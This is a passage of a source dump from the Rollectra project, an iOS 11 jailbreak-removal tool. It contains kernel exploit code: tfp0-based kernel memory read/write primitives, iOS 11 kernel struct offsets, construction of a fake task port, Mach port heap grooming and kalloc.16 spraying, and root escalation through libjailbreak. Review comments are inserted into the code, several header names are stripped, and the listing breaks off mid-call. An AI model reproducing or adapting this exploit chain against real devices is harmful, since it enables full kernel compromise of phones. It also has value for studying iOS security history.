}; 29 | 30 | enum 31 | { 32 | kOSSerializeDictionary = 0x01000000U, 33 | kOSSerializeArray = 0x02000000U, 34 | kOSSerializeSet = 0x03000000U, 35 | kOSSerializeNumber = 0x04000000U, 36 | kOSSerializeSymbol = 0x08000000U, 37 | kOSSerializeString = 0x09000000U, 38 | kOSSerializeData = 0x0a000000U, 39 | kOSSerializeBoolean = 0x0b000000U, 40 | 
kOSSerializeObject = 0x0c000000U, 41 | 42 | kOSSerializeTypeMask = 0x7F000000U, 43 | kOSSerializeDataMask = 0x00FFFFFFU, 44 | 45 | kOSSerializeEndCollection = 0x80000000U, 46 | 47 | kOSSerializeMagic = 0x000000d3U, 48 | }; 49 | 50 | extern const mach_port_t kIOMasterPortDefault; 51 | 52 | CF_RETURNS_RETAINED CFDataRef IOCFSerialize(CFTypeRef object, CFOptionFlags options); 53 | CFTypeRef IOCFUnserializeWithSize(const char *buf, size_t len, CFAllocatorRef allocator, CFOptionFlags options, CFStringRef *err); 54 | 55 | kern_return_t IOObjectRetain(io_object_t object); 56 | kern_return_t IOObjectRelease(io_object_t object); 57 | boolean_t IOObjectConformsTo(io_object_t object, const io_name_t name); 58 | uint32_t IOObjectGetKernelRetainCount(io_object_t object); 59 | kern_return_t IOObjectGetClass(io_object_t object, io_name_t name); 60 | CFStringRef IOObjectCopyClass(io_object_t object); 61 | CFStringRef IOObjectCopySuperclassForClass(CFStringRef name); 62 | CFStringRef IOObjectCopyBundleIdentifierForClass(CFStringRef name); 63 | 64 | io_registry_entry_t IORegistryGetRootEntry(mach_port_t master); 65 | kern_return_t IORegistryEntryGetName(io_registry_entry_t entry, io_name_t name); 66 | kern_return_t IORegistryEntryGetRegistryEntryID(io_registry_entry_t entry, uint64_t *entryID); 67 | kern_return_t IORegistryEntryGetPath(io_registry_entry_t entry, const io_name_t plane, io_string_t path); 68 | kern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t name, io_struct_inband_t buffer, uint32_t *size); 69 | kern_return_t IORegistryEntryCreateCFProperties(io_registry_entry_t entry, CFMutableDictionaryRef *properties, CFAllocatorRef allocator, uint32_t options); 70 | CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, uint32_t options); 71 | kern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties); 72 | 73 | kern_return_t 
IORegistryCreateIterator(mach_port_t master, const io_name_t plane, uint32_t options, io_iterator_t *it); 74 | kern_return_t IORegistryEntryCreateIterator(io_registry_entry_t entry, const io_name_t plane, uint32_t options, io_iterator_t *it); 75 | kern_return_t IORegistryEntryGetChildIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it); 76 | kern_return_t IORegistryEntryGetParentIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it); 77 | io_object_t IOIteratorNext(io_iterator_t it); 78 | boolean_t IOIteratorIsValid(io_iterator_t it); 79 | void IOIteratorReset(io_iterator_t it); 80 | 81 | CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED; 82 | CFMutableDictionaryRef IOServiceNameMatching(const char *name) CF_RETURNS_RETAINED; 83 | io_service_t IOServiceGetMatchingService(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT); 84 | kern_return_t IOServiceGetMatchingServices(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT, io_iterator_t *it); 85 | kern_return_t _IOServiceGetAuthorizationID(io_service_t service, uint64_t *authID); 86 | kern_return_t _IOServiceSetAuthorizationID(io_service_t service, uint64_t authID); 87 | kern_return_t IOServiceOpen(io_service_t service, task_t task, uint32_t type, io_connect_t *client); 88 | kern_return_t IOServiceClose(io_connect_t client); 89 | kern_return_t IOCloseConnection(io_connect_t client); 90 | kern_return_t IOConnectAddRef(io_connect_t client); 91 | kern_return_t IOConnectRelease(io_connect_t client); 92 | kern_return_t IOConnectGetService(io_connect_t client, io_service_t *service); 93 | kern_return_t IOConnectAddClient(io_connect_t client, io_connect_t other); 94 | kern_return_t IOConnectSetNotificationPort(io_connect_t client, uint32_t type, mach_port_t port, uintptr_t ref); 95 | kern_return_t IOConnectMapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t *addr, mach_vm_size_t *size, 
uint32_t options); 96 | kern_return_t IOConnectUnmapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t addr); 97 | kern_return_t IOConnectSetCFProperties(io_connect_t client, CFTypeRef properties); 98 | kern_return_t IOConnectCallMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt); 99 | kern_return_t IOConnectCallScalarMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt); 100 | kern_return_t IOConnectCallStructMethod(io_connect_t client, uint32_t selector, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt); 101 | kern_return_t IOConnectCallAsyncMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt); 102 | kern_return_t IOConnectCallAsyncScalarMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt); 103 | kern_return_t IOConnectCallAsyncStructMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt); 104 | kern_return_t IOConnectTrap6(io_connect_t client, uint32_t index, uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d, uintptr_t e, uintptr_t f); 105 | io_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, const io_string_t path); 106 | 107 | #endif 108 | -------------------------------------------------------------------------------- /Rollectra/kmem.c: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | 
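#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <mach/mach.h>

#include "kmem.h"

/*
 * Kernel memory read/write primitives built on a task port for the kernel
 * task ("tfp0"). Everything here is ordinary, unprivileged Mach traffic
 * (mach_vm_write / mach_vm_read_overwrite); the only special ingredient is
 * the port itself. Whoever holds tfp0 has full kernel read/write, so the
 * port must never be logged, copied into another task or left reachable
 * after the exploit is done.
 *
 * NOTE(review): the system header names were stripped from this listing
 * (angle brackets lost). The four above cover the symbols used in this file
 * (printf, uint*_t, sleep, Mach types/mach_error_string) - confirm against
 * upstream.
 */

/* Process-global kernel task port. MACH_PORT_NULL until the exploit installs one. */
mach_port_t tfp0 = MACH_PORT_NULL;

/*
 * Install the port that rk32/rk64/wk32/wk64 go through. Any port whose
 * kobject looks like a task works (the exploit builds a fake one), hence
 * "fake" in the name.
 */
void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0) {
    tfp0 = fake_tfp0;
}

/*
 * Write a 32-bit value to kernel address `kaddr`.
 *
 * Failures are printed and otherwise ignored (the function is void): a
 * caller that must know whether the write landed has to read it back with
 * rk32(). The 3-second sleep on the "no port yet" path is a deliberate
 * slow-down so the message is noticed in the console, not a retry.
 */
void wk32(uint64_t kaddr, uint32_t val) {
    if (tfp0 == MACH_PORT_NULL) {
        printf("attempt to write to kernel memory before any kernel memory write primitives available\n");
        sleep(3);
        return;
    }

    kern_return_t err = mach_vm_write(tfp0,
                                      (mach_vm_address_t)kaddr,
                                      (vm_offset_t)&val,
                                      (mach_msg_type_number_t)sizeof(uint32_t));
    if (err != KERN_SUCCESS) {
        printf("tfp0 write failed: %s %x\n", mach_error_string(err), err);
    }
}

/*
 * Write a 64-bit value as two 32-bit writes (low half at kaddr, high half at
 * kaddr + 4).
 *
 * Not atomic: between the two writes the kernel can observe a torn value,
 * and because wk32() reports nothing back, the second write still runs if
 * the first one failed, leaving half old / half new data. Acceptable for the
 * single-threaded exploit sequence this is used in; do not use it on a field
 * the kernel may read concurrently without accepting that window.
 */
void wk64(uint64_t kaddr, uint64_t val) {
    uint32_t lower = (uint32_t)(val & 0xffffffff);
    uint32_t higher = (uint32_t)(val >> 32);
    wk32(kaddr, lower);
    wk32(kaddr + 4, higher);
}

/*
 * Read a 32-bit value from kernel address `kaddr`.
 *
 * Returns 0 on every failure (no port installed, Mach error, short read),
 * which is indistinguishable from a genuine zero at that address. Callers
 * that use the result as a pointer or an offset must treat 0 as "read
 * failed" rather than as valid data.
 *
 * The MACH_PORT_NULL guard mirrors the one in wk32(); previously a read
 * issued before the port was installed went straight to
 * mach_vm_read_overwrite() with port 0.
 */
uint32_t rk32(uint64_t kaddr) {
    if (tfp0 == MACH_PORT_NULL) {
        printf("attempt to read kernel memory before any kernel memory read primitives available\n");
        sleep(3);
        return 0;
    }

    uint32_t val = 0;
    mach_vm_size_t outsize = 0;
    kern_return_t err = mach_vm_read_overwrite(tfp0,
                                               (mach_vm_address_t)kaddr,
                                               (mach_vm_size_t)sizeof(uint32_t),
                                               (mach_vm_address_t)&val,
                                               &outsize);
    if (err != KERN_SUCCESS) {
        printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0);
        sleep(3);
        return 0;
    }

    if (outsize != sizeof(uint32_t)) {
        printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize);
        sleep(3);
        return 0;
    }
    return val;
}

/*
 * Read a 64-bit value as two 32-bit reads (low half at kaddr, high half at
 * kaddr + 4). Inherits rk32()'s failure mode: a failed half reads as 0, so a
 * partially failed read yields a plausible-looking but wrong value.
 */
uint64_t rk64(uint64_t kaddr) {
    uint64_t lower = rk32(kaddr);
    uint64_t higher = rk32(kaddr + 4);
    return (higher << 32) | lower;
}
#endif /* WANT_CYDIA */

--------------------------------------------------------------------------------
/Rollectra/kmem.h: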
--------------------------------------------------------------------------------
#ifndef WANT_CYDIA
#ifndef kmem_h
#define kmem_h

/* NOTE(review): the system header name on the next line was lost in this
 * listing (angle brackets stripped); restore it from upstream. */
#include

/*
 * Prototypes for the three Mach VM routines kmem.c uses, declared by hand
 * rather than taken from a system header (presumably because the iOS SDK
 * does not ship a mach_vm header - confirm). They must match the kernel's
 * MIG signatures exactly; a mismatch shows up as MIG/argument errors at
 * call time, not at compile time.
 */
kern_return_t mach_vm_read(
    vm_map_t target_task,
    mach_vm_address_t address,
    mach_vm_size_t size,
    vm_offset_t *data,
    mach_msg_type_number_t *dataCnt);

kern_return_t mach_vm_write(
    vm_map_t target_task,
    mach_vm_address_t address,
    vm_offset_t data,
    mach_msg_type_number_t dataCnt);

kern_return_t mach_vm_read_overwrite(
    vm_map_t target_task,
    mach_vm_address_t address,
    mach_vm_size_t size,
    mach_vm_address_t data,
    mach_vm_size_t *outsize);

/*
 * The kernel task port every primitive below goes through. Defined in
 * kmem.c; MACH_PORT_NULL until prepare_for_rw_with_fake_tfp0() installs one.
 * Possession of this port is equivalent to full kernel read/write, so
 * nothing should log it, copy it or send it to another task.
 */
extern mach_port_t tfp0;

/* Kernel reads. Both return 0 on failure, which is indistinguishable from a
 * real zero at the target address (see kmem.c). */
uint32_t rk32(uint64_t kaddr);
uint64_t rk64(uint64_t kaddr);

/* Kernel writes. Failures are only printed; wk64 is two non-atomic 32-bit writes. */
void wk32(uint64_t kaddr, uint32_t val);
void wk64(uint64_t kaddr, uint64_t val);

/* Install the port used by the rk/wk primitives. */
void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0);

#endif
#endif /* WANT_CYDIA */

--------------------------------------------------------------------------------
/Rollectra/main.m:
--------------------------------------------------------------------------------
//
//  main.m
//  Rollectra
//
//  Created by pwn20wnd on 8/29/18.
//  Copyright © 2018 Pwn20wnd. All rights reserved.
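//

#include <dlfcn.h>
#import <UIKit/UIKit.h>
#import "AppDelegate.h"

/*
 * NOTE(review): the two system header names above were lost in this listing
 * (angle brackets stripped). They were restored from usage - dlopen/dlsym/
 * RTLD_LAZY need <dlfcn.h>, UIApplicationMain needs UIKit - confirm against
 * upstream.
 */

/* Where stdout/stderr are redirected in the Cydia build (see main()). */
#define LOG_FILE "/tmp/rollectra.log"

#ifdef WANT_CYDIA
/* Set platform binary flag: bit 1 of the mask passed to jb_oneshot_entitle_now. */
#define FLAG_PLATFORMIZE (1 << 1)

/*
 * Cydia build only: ask the running jailbreak (libjailbreak.dylib) to fix
 * this process up so that setuid(0) succeeds, then mark it as a platform
 * binary.
 *
 * Best-effort by design: if the library or either symbol is missing the
 * function returns and leaves the process unprivileged; main() calls
 * setuid(0) again afterwards and the unjailbreak path _assert()s on its
 * privileged operations.
 *
 * Fix: both dlsym() results are checked before they are called. The
 * original called setuidptr(getpid()) unconditionally and consulted
 * dlerror() only afterwards, so a libjailbreak that lacked
 * jb_oneshot_fix_setuid_now crashed on a NULL function pointer instead of
 * returning.
 */
void patch_setuidandplatformize() {
    void* handle = dlopen("/usr/lib/libjailbreak.dylib", RTLD_LAZY);
    if (!handle) return;

    // Reset errors
    dlerror();

    typedef void (*fix_setuid_prt_t)(pid_t pid);
    fix_setuid_prt_t setuidptr = (fix_setuid_prt_t)dlsym(handle, "jb_oneshot_fix_setuid_now");

    typedef void (*fix_entitle_prt_t)(pid_t pid, uint32_t what);
    fix_entitle_prt_t entitleptr = (fix_entitle_prt_t)dlsym(handle, "jb_oneshot_entitle_now");

    // dlsym() returns NULL for a missing symbol; never call through it.
    if (setuidptr != NULL) {
        setuidptr(getpid());
    }

    // Unchecked in the original; the failure is only logged here (stderr is
    // already LOG_FILE at this point) so the best-effort contract is unchanged.
    if (setuid(0) != 0) {
        perror("setuid(0) after jb_oneshot_fix_setuid_now");
    }

    const char *dlsym_error = dlerror();
    if (dlsym_error != NULL || entitleptr == NULL) {
        return;
    }

    entitleptr(getpid(), FLAG_PLATFORMIZE);
}
#endif /* !WANT_CYDIA */

/*
 * Entry point.
 *
 * Cydia build: stdout and stderr are appended, unbuffered, to LOG_FILE, the
 * process is escalated to root via libjailbreak, and only then is UIKit
 * started. IPA build: UIKit starts directly and privileges are obtained
 * later through the kernel exploit (see ViewController.m).
 *
 * Security note: LOG_FILE is created in a shared temp directory with the
 * default umask and receives the _assert() diagnostics and everything else
 * written to stdout/stderr while running as root. Treat its contents as
 * readable by other processes on the device.
 */
int main(int argc, char * argv[]) {
#ifdef WANT_CYDIA
    freopen(LOG_FILE, "a+", stderr);
    freopen(LOG_FILE, "a+", stdout);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    patch_setuidandplatformize();
    // Not fatal here: the unjailbreak path _assert()s on the first privileged
    // operation that fails. Logged so a failed escalation is visible in LOG_FILE.
    if (setuid(0) != 0) {
        perror("setuid(0)");
    }
#endif /* !WANT_CYDIA */
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
    }
}

--------------------------------------------------------------------------------
/Rollectra/offsets.h:
--------------------------------------------------------------------------------
#ifndef WANT_CYDIA
#ifndef offsets_h
#define offsets_h

/*
 * Indices into the kstruct_offsets[] table in offsets.m (one set of field
 * offsets, selected by offsets_init() for iOS 11.0 - 11.3.1 kernels).
 * Query them through koffset(); note that koffset() returns 0 before
 * offsets_init() has run.
 */
enum kstruct_offset {
    /* struct task */
    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    KSTRUCT_OFFSET_TASK_REF_COUNT,
    KSTRUCT_OFFSET_TASK_ACTIVE,
    KSTRUCT_OFFSET_TASK_VM_MAP,
    KSTRUCT_OFFSET_TASK_NEXT,
    KSTRUCT_OFFSET_TASK_PREV,
    KSTRUCT_OFFSET_TASK_ITK_SPACE,
    KSTRUCT_OFFSET_TASK_BSD_INFO,

    /* struct ipc_port */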
KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 18 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 19 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 20 | KSTRUCT_OFFSET_IPC_PORT_SET_ID, 21 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT, 22 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV, 23 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 24 | KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME, 25 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 26 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 27 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 28 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 29 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 30 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 31 | 32 | /* struct proc */ 33 | KSTRUCT_OFFSET_PROC_PID, 34 | KSTRUCT_OFFSET_PROC_P_FD, 35 | 36 | /* struct filedesc */ 37 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 38 | 39 | /* struct fileproc */ 40 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 41 | 42 | /* struct fileglob */ 43 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 44 | 45 | /* struct socket */ 46 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 47 | 48 | /* struct pipe */ 49 | KSTRUCT_OFFSET_PIPE_BUFFER, 50 | 51 | /* struct ipc_space */ 52 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 53 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 54 | 55 | KFREE_ADDR_OFFSET, 56 | }; 57 | 58 | int koffset(enum kstruct_offset offset); 59 | void offsets_init(void); 60 | 61 | #endif 62 | #endif /* WANT_CYDIA */ 63 | 64 | -------------------------------------------------------------------------------- /Rollectra/offsets.m: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #import 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "offsets.h" 11 | 12 | int* offsets = NULL; 13 | 14 | int kstruct_offsets[] = { 15 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 16 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 17 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 18 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 19 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 20 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 21 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 22 | 0x368, // 
KSTRUCT_OFFSET_TASK_BSD_INFO, 23 | 24 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 25 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 26 | 0x10, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 27 | 0x18, // KSTRUCT_OFFSET_IPC_PORT_SET_ID, 28 | 0x30, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT 29 | 0x38, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV 30 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 31 | 0x4c, // KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME 32 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 33 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 34 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 35 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 36 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 37 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 38 | 39 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 40 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 41 | 42 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 43 | 44 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 45 | 46 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 47 | 48 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 49 | 50 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 51 | 52 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 53 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 54 | 55 | 0x6c, // KFREE_ADDR_OFFSET 56 | }; 57 | 58 | 59 | int koffset(enum kstruct_offset offset) { 60 | if (offsets == NULL) { 61 | printf("need to call offsets_init() prior to querying offsets\n"); 62 | return 0; 63 | } 64 | return offsets[offset]; 65 | } 66 | 67 | 68 | void offsets_init() { 69 | if (@available(iOS 11.4, *)) { 70 | NSDictionary *systemVersionPlist = [[NSDictionary alloc] initWithContentsOfFile:@"/System/Library/CoreServices/SystemVersion.plist"]; 71 | NSString *ProductBuildVersion = systemVersionPlist[@"ProductBuildVersion"]; 72 | if ([ProductBuildVersion rangeOfString:@"15F5037c"].location != NSNotFound || [ProductBuildVersion rangeOfString:@"15F5049c"].location != NSNotFound || [ProductBuildVersion rangeOfString:@"15F5061e"].location != NSNotFound) { 73 | printf("offsets selected for iOS 11.0 to 
11.3.1\n"); 74 | offsets = kstruct_offsets; 75 | } else { 76 | printf("this bug is patched in iOS 11.4 and above\n"); 77 | exit(EXIT_FAILURE); 78 | } 79 | } else if (@available(iOS 11.0, *)) { 80 | printf("offsets selected for iOS 11.0 to 11.3.1\n"); 81 | offsets = kstruct_offsets; 82 | } else { 83 | printf("iOS version too low, 11.0 required\n"); 84 | exit(EXIT_FAILURE); 85 | } 86 | } 87 | #endif /* WANT_CYDIA */ 88 | 89 | -------------------------------------------------------------------------------- /Rollectra/qilin.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/qilin.o -------------------------------------------------------------------------------- /Rollectra/sploit.c: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include 14 | 15 | #include "sploit.h" 16 | #include "offsets.h" 17 | #include "kmem.h" 18 | 19 | 20 | void increase_limits() { 21 | struct rlimit lim = {0}; 22 | int err = getrlimit(RLIMIT_NOFILE, &lim); 23 | if (err != 0) { 24 | printf("failed to get limits\n"); 25 | } 26 | printf("rlim.cur: %lld\n", lim.rlim_cur); 27 | printf("rlim.max: %lld\n", lim.rlim_max); 28 | 29 | lim.rlim_cur = 10240; 30 | 31 | err = setrlimit(RLIMIT_NOFILE, &lim); 32 | if (err != 0) { 33 | printf("failed to set limits\n"); 34 | } 35 | 36 | lim.rlim_cur = 0; 37 | lim.rlim_max = 0; 38 | err = getrlimit(RLIMIT_NOFILE, &lim); 39 | if (err != 0) { 40 | printf("failed to get limits\n"); 41 | } 42 | printf("rlim.cur: %lld\n", lim.rlim_cur); 43 | printf("rlim.max: %lld\n", lim.rlim_max); 44 | 45 | } 46 | 47 | #define IO_BITS_ACTIVE 0x80000000 48 | #define IKOT_TASK 2 49 | #define IKOT_NONE 0 50 | 51 | void build_fake_task_port(uint8_t* fake_port, 
uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver, uint64_t context) { 52 | // clear the region we'll use: 53 | memset(fake_port, 0, 0x500); 54 | 55 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK; 56 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references 57 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights 58 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver; 59 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = context; 60 | 61 | 62 | uint64_t fake_task_kaddr = fake_port_kaddr + 0x100; 63 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr; 64 | 65 | uint8_t* fake_task = fake_port + 0x100; 66 | 67 | // set the ref_count field of the fake task: 68 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references 69 | 70 | // make sure the task is active 71 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 72 | 73 | // set the vm_map of the fake task: 74 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 75 | 76 | // set the task lock type of the fake task's lock: 77 | *(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 78 | 79 | // set the bsd_info pointer to be 0x10 bytes before the desired initial read: 80 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10; 81 | } 82 | 83 | int message_size_for_kalloc_size(int kalloc_size) { 84 | return ((3*kalloc_size)/4) - 0x74; 85 | } 86 | 87 | 88 | #define N_EARLY_PORTS 80000 89 | mach_port_t early_ports[N_EARLY_PORTS+20000]; 90 | int next_early_port = 0; 91 | 92 | void alloc_early_ports() { 93 | for (int i = 0; i < N_EARLY_PORTS; i++) { 94 | kern_return_t err; 95 | err = mach_port_allocate(mach_task_self(), 
MACH_PORT_RIGHT_RECEIVE, &early_ports[i]);
        if (err != KERN_SUCCESS) {
            printf("mach_port_allocate failed to allocate a new port for early_ports (%d)\n", i);
        }
    }
    next_early_port = N_EARLY_PORTS-1;
}

// Hand out the next unused early receive right, consuming early_ports from the
// top index downwards. Index 0 is never handed out on the normal path.
// NOTE(review): on exhaustion this only prints and sleeps; it then still
// returns early_ports[0] and leaves next_early_port at -1, so any further call
// indexes before the start of the array. "out of early ports" has to be
// treated as fatal for the groom, this function does not enforce that.
mach_port_t steal_early_port() {
    if (next_early_port == 0) {
        printf("out of early ports\n");
        sleep(100);
    }
    mach_port_t p = early_ports[next_early_port];
    next_early_port--;
    //early_ports[next_early_port--] = MACH_PORT_NULL;
    return p;
}

// Debug helper: print every early port name, handed out or not.
void dump_early_ports(){
    for (int i = 0; i < N_EARLY_PORTS; i++) {
        printf("EARLY %d %08x\n", i, early_ports[i]);
    }
}

// Destroy the early ports not yet handed out by steal_early_port(), i.e. the
// indices below next_early_port. The entry at next_early_port itself and the
// already-stolen entries above it are left alone.
void clear_early_ports() {
    for (int i = 0; i < next_early_port; i++) {
        mach_port_destroy(mach_task_self(), early_ports[i]);
    }
}

// Message layout used by kalloc_16(). The 0x200-byte pad is what lets
// msgh_size be set to the value message_size_for_kalloc_size(0x110) returns
// (see the size assumption noted in kalloc_16()).
struct kalloc_16_send_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_ool_ports_descriptor_t ool_ports;
    uint8_t pad[0x200];
};

// Make one kernel kalloc.16 allocation and keep it alive.
//
// Takes an early port and queues on it a complex message with a single OOL
// ports descriptor of two port names. The kernel copies the names in as two
// 8-byte port pointers, a 16-byte buffer from kalloc.16, which stays
// allocated until the message is received (discard_message()) or the port is
// destroyed. Returns the port holding the message so the caller can free the
// kalloc.16 later.
//
// The two names are 0xffffffff (the MACH_PORT_DEAD name value), not
// MACH_PORT_NULL as the older comment said; in either case no real right is
// transferred.
mach_port_t kalloc_16() {
    kern_return_t err;
    // take an early port:
    mach_port_t port = steal_early_port();

    // insert a send right (return value unchecked; a failure shows up as the
    // send below failing):
    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

    // message_size_for_kalloc_size() is defined elsewhere in this file. 0x110
    // is the kalloc size wanted for the kernel-side ipc_kmsg (see vfs_sploit).
    // NOTE(review): nothing checks msg_size <= sizeof(struct kalloc_16_send_msg);
    // if it were larger, mach_msg would read past kalloc_msg on the stack.
    uint32_t msg_size = message_size_for_kalloc_size(0x110);
    // send a message with one OOL descriptor naming two dead ports; the
    // kernel-side pointer array for them ends up in a kalloc.16:
    struct kalloc_16_send_msg kalloc_msg = {0};

    kalloc_msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    kalloc_msg.hdr.msgh_size = msg_size; //sizeof(struct kalloc_16_send_msg);
    kalloc_msg.hdr.msgh_remote_port = port;
    kalloc_msg.hdr.msgh_local_port = MACH_PORT_NULL;
    kalloc_msg.hdr.msgh_id = 0x41414141;

    kalloc_msg.body.msgh_descriptor_count = 1;

    mach_port_t ool_ports[2] = {0xffffffff, 0xffffffff};

    kalloc_msg.ool_ports.address = ool_ports;
    kalloc_msg.ool_ports.count = 2;
    kalloc_msg.ool_ports.deallocate = 0;
    kalloc_msg.ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND;
    kalloc_msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    kalloc_msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY;


    // send it:
    err = mach_msg(&kalloc_msg.hdr,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
